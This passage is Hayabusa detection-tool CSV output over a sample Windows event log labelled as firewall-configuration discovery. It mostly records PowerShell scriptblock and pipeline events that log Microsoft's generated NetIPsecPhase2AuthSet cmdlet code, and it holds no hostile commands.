'ByAssociatedNetIPsecRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase2AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecPhase2AuthSet' function Rename-NetIPsecPhase2AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')]",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.957 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"[ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleEMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase2AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Rename-NetIPsecPhase2AuthSet' function Copy-NetIPsecPhase2AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] $",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.957 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"{NewGPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleEMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase2AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetIPsecPhase2AuthSet'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.973 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-Command): ""Get-Command"" ParameterBinding(Get-Command): name=""Module""; value=""Microsoft.PowerShell.Core"" ParameterBinding(Get-Command): name=""Name""; value=""Set-StrictMode""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.973 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.973 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Collections.Generic.Dictionary[string,string]""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.973 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.973 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""New-NetIPsecPhase2AuthSet""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.973 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): 